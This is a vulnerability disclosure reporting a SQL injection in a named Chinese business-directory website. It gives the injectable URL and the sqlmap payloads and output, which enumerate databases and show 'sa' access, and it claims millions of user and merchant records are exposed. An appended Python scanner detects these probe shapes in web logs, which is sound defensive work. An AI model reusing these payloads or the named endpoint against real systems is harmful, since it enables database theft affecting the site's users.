2015-12-17: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2016-01-28: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
易资源网 (Easy Sources): SQL injection at one endpoint (SA privileges) leaks 5 million+ sensitive records (usernames, passwords, merchant information, enterprise information, etc.)
Injection point: http://www.easysources.cn/z_yijiadan.aspx?id=678880 . It dumps more than 5 million rows directly, including many account names, passwords, merchant details, enterprise details and so on; 5443333 entries in total.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=678880 AND 6992=6992

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=678880 AND 4920=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4920=4920) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 73 columns
    Payload: id=678880 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(120)+CHAR(113)+CHAR(89)+CHAR(112)+CHAR(112)+CHAR(97)+CHAR(87)+CHAR(86)+CHAR(99)+CHAR(86)+CHAR(102)+CHAR(72)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL

[12:31:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Microsoft SQL Server 2008
available databases [18]:
[*] BiddingSystemDB
[*] CMSHY
[*] CmsProject
[*] cmsutm
[*] comfort__aspnetdb
[*] comfort_mainDB
[*] comfort_SnsDB
[*] comfort_webcastdb
[*] HYCMS
[*] master
[*] model
[*] msdb
[*] NewEs168
[*] ReportServer
[*] ReportServerTempDB
[*] RobotAlliance
[*] tempdb
[*] utmcms
current user: 'sa'
current database: 'NewEs168'
database management system users password hashes:
Database: NewEs168
[167 tables]
Database: NewEs168
Table: Whir_U_CompanyAnalyse
[8 columns]
+---------------------------+----------+
| Column                    | Type     |
+---------------------------+----------+
| address                   | varchar  |
| CompanyID                 | int      |
| Date                      | datetime |
| Mune                      | nvarchar |
| TypeID                    | int      |
| UserID                    | int      |
| UserName                  | varchar  |
| Whir_U_CompanyAnalyse_PID | int      |
+---------------------------+----------+
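As an added defensive example that is not part of the original report: a small Python scanner that looks for the three probe shapes sqlmap reported above (the boolean tautology, the CONVERT(INT, ...) error-based probe and the UNION ALL SELECT NULL query) in IIS-style web server log lines for the injected z_yijiadan.aspx endpoint. The log lines, client addresses, status codes and rule names are constructed assumptions, not data from the page.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# The query strings reproduce the three probe shapes sqlmap reported against z_yijiadan.aspx.
SAMPLE_LOG = """\
2015-12-17 12:31:20 10.0.0.5 GET /z_yijiadan.aspx id=678880 200
2015-12-17 12:31:21 10.0.0.5 GET /z_yijiadan.aspx id=678880+AND+6992%3D6992 200
2015-12-17 12:31:22 10.0.0.5 GET /z_yijiadan.aspx id=678880+AND+4920%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%29%29 500
2015-12-17 12:31:23 10.0.0.5 GET /z_yijiadan.aspx id=678880+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CCHAR%28113%29%2CNULL-- 200
2015-12-17 12:31:24 10.0.0.9 GET /z_yijiadan.aspx id=12345 200
"""

# Each rule is named after the sqlmap technique it corresponds to and runs on the decoded query.
RULES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based (CONVERT)": re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}

def decode_query(raw: str) -> str:
    """Decode percent-encoding and '+' so the rules see the SQL the server saw.
    Decoding twice also catches one level of double-encoding."""
    return unquote_plus(unquote_plus(raw))

def scan_log(text: str) -> list[dict]:
    """Return one finding per log line whose query string matches an injection rule."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # malformed or truncated line, skip it
        date, time, client, method, stem, query, status = fields[:7]
        decoded = decode_query(query)
        hits = [name for name, rx in RULES.items() if rx.search(decoded)]
        if hits:
            findings.append({"time": f"{date} {time}", "client": client, "uri": stem,
                             "status": int(status), "techniques": hits, "decoded": decoded})
    return findings

def non_numeric_id(query: str) -> bool:
    """Tighter per-endpoint check: id= should be an integer here, anything else is a probe."""
    m = re.match(r"id=(.*)$", decode_query(query))
    return m is not None and not m.group(1).isdigit()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["status"], f["techniques"], f["decoded"])
```

The 500 status on the CONVERT probe is the error-based channel itself: a database error surfacing as an HTTP error is a signal worth alerting on even before the query is inspected.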
Fix
Unable to contact the vendor, or the vendor actively refused.